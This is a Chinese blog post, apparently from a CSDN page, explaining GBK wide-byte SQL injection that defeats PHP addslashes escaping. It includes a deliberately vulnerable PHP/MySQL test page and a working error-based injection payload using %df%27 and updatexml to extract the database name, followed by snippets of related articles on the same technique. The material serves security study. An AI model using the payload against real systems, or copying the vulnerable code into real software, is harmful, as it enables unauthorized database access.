gbk宽字节绕过

最新推荐文章于 2024-04-08 16:45:01 发布
最新推荐文章于 2024-04-08 16:45:01 发布
阅读量1.1k 收藏
点赞数
分类专栏: SQL 文章标签: gbk绕过 宽字符绕过

测试代码

<!DOCTYPE html> 
<meta charset="gbk">
<?php 
error_reporting(0);
$conn = mysql_connect('127.0.0.1','root','root'); 
mysql_select_db('test',$conn);
#mysql_query("set names gbk"); 
$id = addslashes($_GET['sql']); 
$sql = "SELECT username,password FROM admin WHERE id='{$id}'"; 
echo $sql.'</br></br></br></br>';
if($res = mysql_query($sql)){ 
while($row = mysql_fetch_array($res)){
 var_dump($row);
}
}else{ 
echo "Error".mysql_error()."</br>"; 
 } 
?>

直接 '  会被转义,不会被执行。

使用宽字符就可以被成功执行

解析过程

  • $_GET[‘id’]经过addslashes编码之后带入了‘’
  • 变成 <pre>2%df%5C%27 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)%23</pre>
  • 带入mysql处理时使用了gbk字符集
  • %df%5c 運成功的吃掉了%5c
  • %27‘单引号成功闭合
  • GBK编码,编码范围是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)时自动拼接%5c,因此吃掉‘’,而%27、%20小于ascii(128)的字符就保留了。

 

转载来源

 

 

花自飘零丶水自流
关注
专栏目录
【漏洞挖掘】——117、字节注入深入刨析
Fly_鹏程万里
06-26 143
字节字符的大小为一个字节时,称其字符为窄字节字节字符的大小为两个字节时,称其字符字节字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码格式从而导致产生字节注入,例如:在使用PHP连接MySQL的时候,很多人都会增加一句。
字节注入---GBK字节绕过
糖小喵
04-21 904
原理 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。 mysql 在使用 GBK 编码的时候, 会认为两个字符...
SQL注入防御绕过——字节注入
weixin_30839881的博客
07-05 517
01 背景知识 字符集 在了解字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 latin1编码:单字节编码 gbk编码:使用一字节和双字节编码,0x00-0x7F范围内是一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE UTF-8编码...
mysql 字符注入_注入姿势-字符绕过
weixin_35698190的博客
01-27 143
最小的字符集是ascii字符集,只有128个有效字符,用十六进制表示只是0x00-0x7F.随后由于网络发展,为了跨国家统一使用增大可以表示的字符就用两个字节表示一个字符,有了gb2312范围在[0xA1-0xF7][0xA1-0xFE](中间很多没有填满),它保证所有字节在A0以上,也就在7F以上了。而另一种编码GBK编码则是完全兼容gb2312(就是说在gb2312字符集中每个字符位置,与gb...
字节注入——魔术引号的绕过
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-06 2804
字节注入 原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。 靶场地址 第一题: 首先先在url栏输入’ and 1=2 %23 发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码 %df...
slilabs靶场记录字节绕过(七)
wanan的博客
10-08 855
slilabs靶场记录字节绕过(七)
sql注入绕过addslashes函数-字节注入
G208_522的博客
03-15 4689
字节注入 字节注入要求: 1、数据库的编码GBK 2、addslashes()函数,检测在单引号前加\ addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(") 反斜杠(\) NULL 一、单引号探测 http://localhost:8899/sqli-lab/Less-33/index.php?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为G
字节注入(知识点)
qq_39416206的博客
03-11 828
字节注入
Sql漏洞注入之字节注入
Matheus的博客
07-30 595
绕过字节注入攻击 字节注入攻击 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca
字节注入
weixin_53026460的博客
11-07 1684
但是编码不同就会产生歧义,比如说编码a和编码b,组合在一起的时候可能形成某一个汉字,如果编码a、b、c三个字符在一起,去编码的时候,用不同的编码去看待它是不一样的东西;举个例子,有句话叫:下雨天留人天留我不留,我们可以通过断句的不同来决定这句话的涵义;编码也是一样的,也有标点符号的问题,比如说原本是普通的英文编码,假设a、b、c、d这是四个单独的字符,但是呢现在这个英文编码传过去之后用中文去解,这个时候它可能会被解码出其他的东西。所以说不同的编码会造成不同的状态;
10-Web安全——SQL注入WAF绕过字节注入
网络安全
06-04 910
addslashes()函数在指定的预定义字符前添加反斜杠,这些字符是单引号('),双引号("),反斜线(\)与NUL(NULL字符)。例如客户端提交的参数中如果含有单引号,双引号等这些特殊字符,addslashes函数则会在单引号前加反斜线“\”,将单引号转义成没有功能性的字符。 举个栗子: 以查询用户名为1’的信息为例,username中的参数为1',MySQL数据库在解析这条SQL语句时,会把1后面的单引号认为是闭合符号要求再输入一个单引号闭合,而不是当做username参数的一部分来处.
gbk字符编码字节sql注入
sworddancing is the best one
09-27 2576
ctf题目中字节注入是很常见的问题,我这篇文章的目的就是弄明白其中的原理。 通常来说,一个gbk编码的汉字通常占用两个字节,一个utf-8编码汉字,占用三个字节, 占用3个字节。在php中,我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2,utf-8时输出3。   说了这么多废话,现在来研究一下在SQL注入中,gbk字符编码带来的各种...
利用GBK字节编码突破PHP单引号转义限制进行SQL注入
Exploit的小站~
04-11 2979
今天看了黑防2009精华本下册《双字节编码:PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0
SQL注入之字节注入演示(详细介绍字节
Firebasky的博客
05-02 5003
字节介绍原理即绕过演示 自己对字节的认识和理解,如果有错误望指出,共同学习。 字节的介绍 GBK 是占两个字节(也就是名叫字节,只要字节大于1的都是) ASCII 占一个字节 PHP中编码GBK ,函数执行添加的是ASCII编码,mysql默认字符集是GBK字节字符集 为什么要介绍字节字节的出现个人感觉是因为SQL语句过滤了一些字符,比如 ’ 转义成 /’ 或者 ...
php语句 绕过验证,PHP中GPC绕过的一些总结
weixin_40006763的博客
03-10 310
lib3rt3邪恶八进制PS:PHP中绕过GPC的情况有很多,本文仅仅是总结了一些比较常见的,而且写的很浅(因为本人水平有限),欢迎大家积极拍砖:)ryat[at]wolvez.orghttp://www.wolvez.org2007-10-181.通过数据库(文本)中转通过数据库中转:(注意存入数据库和select出的数据)用户输入===>gpc\addslashes()=========...
字节注入和二次编码注入(绕过/‘转义)less32-33
01mx的博客
03-27 2502
Unicode 统一码,也叫万国码、单一码(Unicode)是计算机科学领域里的一项业界标准,包括字符集、编码方案等。Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。 如果把各种文字编码形容为各地的方言,那么Unicode就是世界各国合作开发的一种语言。 字符(两个以上字节字符是指两个字节度的编码技术,如UNICODE、GBK、BIG5等。 我们这里的字节注入是利用的MySQL的一
字节注入原理与防御
wtf0712的博客
11-06 7613
gbk编码原理 一个字符占1个字节 两个字节以上叫字节 设置“set character_set_client=gbk”(gbk编码设置),通常导致编码转换的注入问题,尤其是使用php连接mysql数据库的时候 一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字节(64-254) 当设置gbk编码后,遇到连续两个字节,都符合gbk取值范围,会自动...
彻底搞懂编码 GBK 和 UTF8
热门推荐
weixin_34279184的博客
11-23 1万+
常用编码格式一览 首先来看一下常用的编码有哪些,截图自Notepad++。其中ANSI在中国大陆即为GBK(以前是GB2312),最常用的是 GBK 和 UTF8无BOM 编码格式。后面三个都是有BOM头的文本格式,UCS-2即为人们常说的Unicode编码,又分为大端、小端。 所谓BOM头(Byte Order Mark)就是文本文件中开始的几个并不表示任何字符字节,用二进制编辑器(如...
代码审计sql注入部分函数绕过方法
最新发布
weixin_68408599的博客
04-08 877
这里我们可以看到在对代码层面做操作,首先有个函数addslashes,他是一种在PHP中存在的字符串处理函数,它的作用是在指定的字符前添加反斜线。(bf是第一个而5c是第二个),当使用GBK编码遇到两个字节都符合其取值范围时,就会将其解析成为一个汉字,第一个字节取值范围为。这里过滤了太多东西,大小写还有正则,但是我们回到第一张图片,可以看到一个函数:urldecode(),对url解码。在这里,看似可能是安全的,但是还是无法解决问题,因为在第8行的。,有些程序员为了方便,可能也会在这边偷工减料。
能否把字节转为窄字节
07-14
上述代码首先将字节字符串使用UTF-8编码进行解码,然后再使用GBK编码进行编码,得到了窄字节字符串。 请注意,具体的编码方案要根据你的需求和上下文来选择。此外,在进行字符编码转换时,需要确保源字符串的编码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值